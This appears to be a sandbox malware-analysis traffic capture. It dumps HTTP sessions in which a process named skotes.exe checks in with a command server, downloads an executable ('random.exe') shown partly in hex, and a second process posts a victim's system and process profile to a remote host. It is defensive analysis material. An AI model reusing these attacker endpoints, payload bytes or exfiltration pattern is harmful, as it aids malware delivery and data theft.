                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 09 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 56 48 00 00 fc 76 00 00 32 00 00 00 d0 c8 00 00 10 00 00 00 70 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 c9 00 00 04 00 00 c2 11 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 70 74 00 73 00 00 00 00 60 74 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 bc c8 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 bb c8 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELcg(VHv2pH@D@ _pts`t@ PtL(@.rsrc`t\(@.idata pt^(@ 8t`(@bpttswmypPnb(@dlztltgcC@.taggant0"C@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:45.887013912 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:45.887026072 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:45.887131929 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:45.887145042 CET896INData Raw: 2b d3 2e 14 5e 99 a0 4b 79 a6 d5 8c 2f 72 c3 19 4f 7e e9 19 32 98 9e 0b ae 33 13 c5 fa 0a 27 04 53 8a 2b e2 ca da 85 fc fd bd 9d dd e5 6b 2f 16 75 99 d6 3b d8 9a 9e 4a 78 10 1d 0d 36 1b 1d 25 d7 ff 04 54 7e c0 44 09 d5 0e 7f 71 37 21 9d 0a 0d 0e
                                                                                                                                                                                                                                                                          Data Ascii: +.^Ky/rO~23'S+k/u;Jx6%T~Dq7!R|3#{B{C[{*&@eP>2,bYCFp-IM"8O.?=|S:G"0R[]Ed@Qvq$q;6H1N?lF/?tDeq,Q&
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:45.887306929 CET1236INData Raw: 3e a9 66 7c 4d be 0c 96 42 a2 af 20 78 39 f7 ac 86 78 a0 f9 b7 ee a7 bd 7e 66 a4 06 67 b1 c2 ba 94 8e cb 1e 85 06 4e a9 40 a4 bd bc d0 0f 5d af 08 cf bd 54 ef b2 7e 4a 2f 97 f0 2b 8b 76 ae 70 9d 1e 1f bf 9a c0 76 c5 bc b0 32 b2 c8 a7 9d 53 e0 da
                                                                                                                                                                                                                                                                          Data Ascii: >f|MB x9x~fgN@]T~J/+vpv2SnCFMMeE/=(atR$jE5:2fBwAME_}w{iY6Vpnw3EZH22[*hyNK$A8R N
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:45.887355089 CET224INData Raw: 78 4e 23 59 7f 13 e6 8b f4 0e 2a 54 b2 f0 e8 8d c4 76 a4 35 ac 07 7a b9 30 b0 78 ea af dd 6f 84 0f 30 a3 a8 9b 7c 40 cd 17 52 2a ab 20 18 be 7d 06 75 06 84 d9 0f e6 28 d5 cd 45 4e 0e 24 94 b5 84 19 5b f1 d2 b4 29 36 57 05 b7 68 33 3f ab c3 37 13
                                                                                                                                                                                                                                                                          Data Ascii: xN#Y*Tv5z0xo0|@R* }u(EN$[)6Wh3?7M"jgC!O6KV9+7q-=nc%l'32_zi'GOJ>j:192Coc<aHi#;}/9@+xa@sJx
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:45.887365103 CET1236INData Raw: c5 30 a1 6d 03 34 8b f9 bc 20 2f cf fd fb 87 ce 5b b1 86 19 79 ed 22 c1 0a f0 ca bb 4d 7a 5e ae 72 cd 44 1a 98 d8 fe c5 89 fe 38 b5 16 c0 a1 4c 1d 5d 22 73 d9 9e 71 a5 f4 b2 37 12 4e 72 c3 38 77 fa 96 4c 1b c2 ac c2 84 a6 57 ea 19 c6 d2 f3 33 86
                                                                                                                                                                                                                                                                          Data Ascii: 0m4 /[y"Mz^rD8L]"sq7Nr8wLW3iGO/3+P:EKy@{SFf[<7zfn@o^W[p"?IU|)Vy3^3I[#Yd=:=-RtgHm:=
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:45.887530088 CET1236INData Raw: f9 a2 ab 3a bc c8 85 01 85 52 df 8f 7c 7e a6 a8 61 e9 ac f7 ce 0c 3f 57 73 7e 83 e7 f4 6a 43 27 38 98 5e 68 c1 8b 4c 33 ef ec 03 60 3f 8e aa 3b db fa 3c f4 bf 20 22 f6 66 07 fa 6d 63 3d 0e 36 43 b3 50 4d 69 ce c9 26 0b 1b bf 8b fb 18 24 8d 88 69
                                                                                                                                                                                                                                                                          Data Ascii: :R|~a?Ws~jC'8^hL3`?;< "fmc=6CPMi&$iF&1SdM'%;m'f`k,Ur/dIM3}ee6)\6]|9UB"F=!e"EX*ly8$B[d7 D+!3 >
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:45.887541056 CET1236INData Raw: 1e fb 37 de 8b 02 2a 4d 3c e3 aa e8 05 3f 2d 9d 55 a6 4d 42 78 a4 c4 53 b7 12 81 90 10 11 d3 2c 5c 93 4b 4d b0 d2 f2 db d5 2c ae 41 7d 8b 4e 74 f8 36 44 05 3f 4a d6 cb b1 ae a1 10 91 4b 86 ba 22 30 2b dd aa 70 ea 01 f1 a0 dd f8 f3 3d b2 60 ed 54
                                                                                                                                                                                                                                                                          Data Ascii: 7*M<?-UMBxS,\KM,A}Nt6D?JK"0+p=`T#y@u3_(-1sQOi/(B)BPSy[G^mDAV^GD}GuS^ D>aLNu3LFN\f+*r*-oe:.c(`
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:46.006690025 CET1236INData Raw: 58 82 9d bf 56 07 71 42 79 92 1b 9f ad a8 5a 4c 96 e5 03 f2 82 e6 94 0d 9d 44 15 19 a3 ee 05 93 47 88 65 2e 03 8c 42 c1 69 66 1b e5 5f f3 fe 2c 41 f7 a4 43 dd 7f c5 db 26 fc 5b bb ec d9 cd e1 db aa c6 41 bf 91 63 10 78 b4 11 a6 00 c2 cd 07 59 4a
                                                                                                                                                                                                                                                                          Data Ascii: XVqByZLDGe.Bif_,AC&[AcxYJy,FAHxXv~DDPC.r6yNLDcZk$kD]#s/Je%"EgQ*)r*C=0/6Gd9=/,6<IIx


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          11192.168.2.549944185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:55.487870932 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 37 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018971001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:56.837537050 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:56 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          12192.168.2.54995131.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:56.977826118 CET62OUTGET /files/loadman/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.336678028 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:58 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 1374720
                                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 17:14:58 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "67645492-14fa00"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 e0 68 17 44 00 8c 14 00 e1 14 00 00 e0 00 26 03 0b 01 02 26 00 c8 0b 00 00 f6 14 00 00 04 00 00 80 14 00 00 00 10 00 00 00 e0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 5c 55 1a 00 02 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 14 00 08 1c 00 00 00 90 14 00 2c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 00 bc 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 8e 12 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELhD&&@p\U@ P,lcT.text``.dataH@.rdata@@.eh_framp@@.bss4@.idataP@.CRT8p$@.tls&@.rsrc,ln(@@.reloccd@B
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.336730003 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 eb 0d 90 90 90 90 90 90 90 90 90 90 90 90 90 83 ec 1c 31 c0 66 81 3d 00
                                                                                                                                                                                                                                                                          Data Ascii: 1f=@MZATATATu<@@PE@tZ@TATu<$ATATQ=8KtH1f$fQft
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.336747885 CET448INData Raw: b1 fc ff ff 90 83 ec 1c 8b 44 24 20 89 04 24 e8 f1 7c 0b 00 85 c0 0f 94 c0 83 c4 1c 0f b6 c0 f7 d8 c3 90 90 90 55 89 e5 83 ec 08 8d 0d 04 a1 52 00 8d 05 20 40 54 00 89 0c 24 89 44 24 04 e8 82 23 0b 00 83 c4 08 5d c3 66 2e 0f 1f 84 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: D$ $|UR @T$D$#]f.UR @T$D$%]ffffffUEPuM uPQ]]rPQ1s]f.fUVtjPvyFtjPvd
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.336812973 CET1236INData Raw: 83 c4 0c 8b 5e 30 8b 46 2c 85 db 89 45 f0 74 31 8b 45 f0 8d 78 08 eb 13 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 83 c7 14 4b 74 16 8b 47 fc 85 c0 74 f3 6a 01 50 ff 37 e8 59 e2 00 00 83 c4 0c eb e4 8b 46 28 85 c0 74 14 c1 e0 02 8d 04 80 6a 04 50 ff
                                                                                                                                                                                                                                                                          Data Ascii: ^0F,Et1Exf.KtGtjP7YF(tjPu<FHPF4=ttjPv8rtvIFrtv4Frtv\Vz^_[]F4tjPv8s
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.336858988 CET1236INData Raw: 44 01 d8 39 f8 0f 83 c4 02 00 00 0f b6 0c 06 31 c0 ba 01 00 00 00 0f a5 d0 d3 e2 f6 c1 20 b9 00 00 00 00 0f 45 c2 0f 45 d1 23 44 24 2c 23 54 24 50 09 c2 74 bc 8b 4c 24 28 8b 54 24 20 89 f0 39 d1 89 d6 8d 14 18 0f 47 f1 8b 4c 24 30 89 f0 89 74 24
                                                                                                                                                                                                                                                                          Data Ascii: D91 EE#D$,#T$PtL$(T$ 9GL$0t$<9Gf9tL<\$9'\$$x:t+\$(t$4D$ |$Xf.fD$(|$t$4@9D$ s:H;D$09L$$:tD$X\$L
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.336870909 CET1236INData Raw: 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 8b 44 24 08 89 44 24 08 01 f0 53 ff 74 24 20 50 e8 d3 71 0b 00 83 c4 0c 8b 45 10 01 de 29 f7 89 74 24 18 39 c7 89 c7 0f 83 13 fe ff ff 57 56 8d 44 24 18 50 e8 97 71 00 00 83 c4 0c 8b 44 24 14 8b 74 24 18 8b
                                                                                                                                                                                                                                                                          Data Ascii: .@D$D$St$ PqE)t$9WVD$PqD$t$}E|$L$@)D$)9sD$QWPUqL$|$L$PSQNqD$T|$D$xe^_[]t$<K9G(\$(|$K9G
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.336883068 CET1236INData Raw: 8d 85 40 ff ff ff 50 e8 dd aa 00 00 83 c4 14 8b 85 44 ff ff ff 3b b5 48 ff ff ff 75 9c 56 89 c6 50 ff 75 ec e8 f0 6c 0b 00 83 c4 0c 85 c0 0f 94 c1 8b 85 40 ff ff ff 85 c0 75 8c eb 9a 8d 85 40 ff ff ff 50 e8 50 19 00 00 83 c4 04 81 bd 40 ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii: @PD;HuVPul@u@PP@H@@P@DHE]jhPj(h`PS*$jhPjAhPPEjhPj=hPPu
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.337030888 CET896INData Raw: 74 0c 6a 01 50 56 e8 3a cf 00 00 83 c4 0c 8b 45 b0 c7 85 40 fe ff ff 00 00 00 00 c7 85 44 fe ff ff 01 00 00 00 c7 85 48 fe ff ff 00 00 00 00 89 85 10 ff ff ff 8b 45 b4 89 85 30 ff ff ff 8b 45 b8 85 c0 0f 84 e8 02 00 00 8b 8d 30 ff ff ff 8b 55 e8
                                                                                                                                                                                                                                                                          Data Ascii: tjPV:E@DHE0E0U_1]UEEE,,f.D0FMH;MMw'-t4~;@u[f.fxyS]%
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.337141037 CET1236INData Raw: 83 c4 0c ff 0f 75 15 ff 4f 04 75 10 6a 08 68 58 01 00 00 57 e8 ac cb 00 00 83 c4 0c 8d b5 00 fe ff ff 6a 0c 68 f0 8f 50 00 6a 30 68 c0 8f 50 00 56 e8 5f a2 00 00 83 c4 14 8d 85 fc fe ff ff 89 b5 40 fe ff ff c7 85 44 fe ff ff 60 21 40 00 c7 85 40
                                                                                                                                                                                                                                                                          Data Ascii: uOujhXWjhPj0hPV_@D`!@@PDPH@L`!@HL@QPEEjhPjyhPPjh!Phh
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.337152958 CET1236INData Raw: b0 89 55 dc 89 f9 ff 75 ac ff 75 ec ff b5 e0 fe ff ff e8 aa e7 ff ff 83 c4 0c 8d 85 e4 fe ff ff 89 b5 40 ff ff ff c7 85 44 ff ff ff 60 21 40 00 c7 85 40 fe ff ff 48 92 50 00 c7 85 44 fe ff ff 05 00 00 00 c7 85 50 fe ff ff 00 00 00 00 89 85 48 ff
                                                                                                                                                                                                                                                                          Data Ascii: Uuu@D`!@@HPDPHL`!@PT`!@X\`!@`@d`!@HL@QPEtjPu4tjP8
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:58.456445932 CET1236INData Raw: ff ff 85 c0 74 11 6a 01 50 ff b5 28 fe ff ff e8 09 c2 00 00 83 c4 0c 8b 85 30 fe ff ff 85 c0 74 11 6a 01 50 ff b5 34 fe ff ff e8 ee c1 00 00 83 c4 0c 8b 85 14 ff ff ff 85 c0 74 11 6a 01 50 ff b5 08 ff ff ff e8 d3 c1 00 00 83 c4 0c 85 f6 74 0e 6a
                                                                                                                                                                                                                                                                          Data Ascii: tjP(0tjP4tjPtjVutjPnt*^fOtCtjP3it@jPVK^_[]jQ


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          13192.168.2.549960185.121.15.192806704C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:59.667721033 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: home.fivetk5ht.top
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Content-Length: 442226
                                                                                                                                                                                                                                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 34 30 30 39 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734740096", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:59.788085938 CET4944OUTData Raw: 52 45 41 41 67 45 43 42 41 51 44 42 41 63 46 42 41 51 41 41 51 4a 33 41 41 45 43 41 78 45 45 42 53 45 78 42 68 4a 42 55 51 64 68 63 52 4d 69 4d 6f 45 49 46 45 4b 52 6f 62 48 42 43 53 4d 7a 55 76 41 56 59 6e 4c 52 43 68 59 6b 4e 4f 45 6c 38 52 63
                                                                                                                                                                                                                                                                          Data Ascii: REAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6\/9o
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:59.788213015 CET9888OUTData Raw: 2f 41 46 55 79 53 54 35 6b 52 5c 2f 4c 54 5c 2f 77 41 6a 2b 54 39 4f 50 55 31 4d 7a 65 5a 38 36 5a 54 70 5c 2f 72 4d 5c 2f 35 36 66 68 51 48 38 74 59 74 6e 6d 66 75 34 73 65 5a 5c 2f 30 77 2b 31 66 35 5c 2f 6e 36 6d 67 36 43 74 5c 2f 45 6d 39 50
                                                                                                                                                                                                                                                                          Data Ascii: /AFUyST5kR\/LT\/wAj+T9OPU1MzeZ86ZTp\/rM\/56fhQH8tYtnmfu4seZ\/0w+1f5\/n6mg6Ct\/Em9Pk\/5apJ+\/g+t1+X4fpQ3+shf\/XH\/lrJ24\/z+tPjCRtv2SIlx+9I\/wBR\/wBuvv8Az9+1Mkz9wfJ+98r\/AEjr\/nP+TXQAz\/lpN\/B5cX\/LT9\/P\/n\/9XrRJ+73\/AL6X93+9h\/z+Xt9ehANrP\/rNn
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:59.788374901 CET9888OUTData Raw: 4b 66 47 65 70 58 4e 6b 74 6e 72 2b 6d 61 58 66 53 43 47 79 31 62 54 70 54 63 70 62 47 31 63 33 42 6a 6a 6d 65 53 47 5a 55 5c 2f 77 42 4b 50 32 57 76 67 39 39 49 44 77 7a 2b 6b 35 54 7a 48 6a 4c 77 70 38 59 65 41 65 45 63 7a 34 47 34 6f 79 5c 2f
                                                                                                                                                                                                                                                                          Data Ascii: KfGepXNktnr+maXfSCGy1bTpTcpbG1c3BjjmeSGZU\/wBKP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4z4X4dxlaMcFisrweYYvNsqwOXVqyxtGNbAUa9SVRV4OVCPNzH+cf7SXxW8D\/EP6O1XAcJeJfhTxvxTl\/GfDeOyrA8O8acJcR59hKLlisNmWKwOFyvM8ZmFKk8JWlSxlWjTVN0Z8tZ8vKfDeD\/AHf\/
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:59.907696962 CET2472OUTData Raw: 69 4a 34 48 77 78 71 68 38 58 61 33 2b 7a 64 34 66 30 37 55 76 42 35 31 44 39 71 58 78 4c 71 50 68 62 34 5a 4f 76 69 44 56 70 4c 4f 32 31 44 54 50 6a 76 34 74 5c 2f 5a 33 6e 6d 38 56 54 66 38 49 72 48 50 70 31 6b 5c 2f 6a 37 77 56 72 4d 38 4d 6d
                                                                                                                                                                                                                                                                          Data Ascii: iJ4Hwxqh8Xa3+zd4f07UvB51D9qXxLqPhb4ZOviDVpLO21DTPjv4t\/Z3nm8VTf8IrHPp1k\/j7wVrM8MmjWviC4OgC3vHto9TeXR4frOC8n+i3wFn+XZ5wdjMlyvPsbSznLsuxEeIeKMxnWhg44uOc4aOGzPM8bhva4aOWYtV41KCr0\/q83CzlFz+H8Q89+mX4k8J5tkfiBg+IM34Uy7EcN5jmtGfCnBuVUaFbNoU8Vw1iZY3
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:59.907742977 CET2472OUTData Raw: 2b 57 6e 35 48 32 2b 6d 66 77 39 75 67 30 70 39 66 6c 2b 6f 78 39 6e 7a 6f 55 33 34 6c 5c 2f 64 52 5c 2f 2b 6c 66 2b 66 58 6a 32 71 74 38 2b 66 39 6a 5c 2f 41 4b 36 2b 5c 2f 58 5c 2f 50 31 78 32 71 7a 4a 35 32 33 79 5a 73 4a 2b 39 42 5c 2f 64 5c
                                                                                                                                                                                                                                                                          Data Ascii: +Wn5H2+mfw9ug0p9fl+ox9nzoU34l\/dR\/+lf+fXj2qt8+f9j\/AK6+\/X\/P1x2qzJ523yZsJ+9B\/d\/uL7\/r69Mfh2FM\/vBPf7LJ\/TH+e1BoQ\/dkT5Nn\/tUf5\/yc0ySN9qK\/2f6+X+vr+NPkzJHvd\/8AWS\/+TH\/T37f\/AFqVf9XsTzP3kv7z\/Pt7fWuc6Cq+\/wAt9ib\/AN71\/wCe3\/1\/w57c0z7rfL
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:59.907856941 CET4944OUTData Raw: 4e 71 48 68 54 53 72 66 55 74 59 2b 4c 65 6d 65 47 50 69 43 4c 6e 34 4a 65 4c 50 68 39 72 66 37 53 66 67 71 31 31 7a 77 33 6f 4f 75 53 58 39 6c 34 7a 6b 76 72 4e 68 4c 42 44 4c 36 30 76 68 72 77 36 71 6c 46 30 44 52 56 52 73 37 6b 58 53 72 45 4b
                                                                                                                                                                                                                                                                          Data Ascii: NqHhTSrfUtY+LemeGPiCLn4JeLPh9rf7Sfgq11zw3oOuSX9l4zkvrNhLBDL60vhrw6qlF0DRVRs7kXSrEK2Rg5UQYORwcjkcVxetfDq88Sy+D9P8Q+N\/Feq+Bvh7qGp6t4D+Gs+qai3gTwfqut3CXOu6n4b8My6hPomiahrk8UMur3ul6bZ3OpSQxveSTsi7fxjHfRFxOW8PRyPhvi7NcRVxlLLMoxWZY\/EUKOMyzKY5hjcTn
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:59.908001900 CET4944OUTData Raw: 77 41 57 52 2b 52 34 58 38 53 5c 2f 42 6a 78 58 70 6b 48 39 67 58 74 5c 2f 4e 5a 4e 62 61 61 4e 4e 39 39 75 64 47 30 75 38 69 53 43 37 30 36 77 75 6f 59 77 42 48 44 63 32 56 76 50 45 67 42 79 41 6b 63 73 62 49 6f 42 35 41 55 44 6e 6d 71 6b 6e 68
                                                                                                                                                                                                                                                                          Data Ascii: wAWR+R4X8S\/BjxXpkH9gXt\/NZNbaaNN99udG0u8iSC706wuoYwBHDc2VvPEgByAkcsbIoB5AUDnmqknhfw7LjzdC0WTbnb5mlWL4zjON0BxnAzjrgelcP8AxJTw7h4ZbhMBxlnVDLcso4SlSwVTDZfXVWeGxHCeJ9tiJV8LWhiJupwfl6VPFU8ThFDGZsvqnPj51IelS\/aFcUThjKmN4ByGrj8asypSxeHxma4RUsNmH+s\/
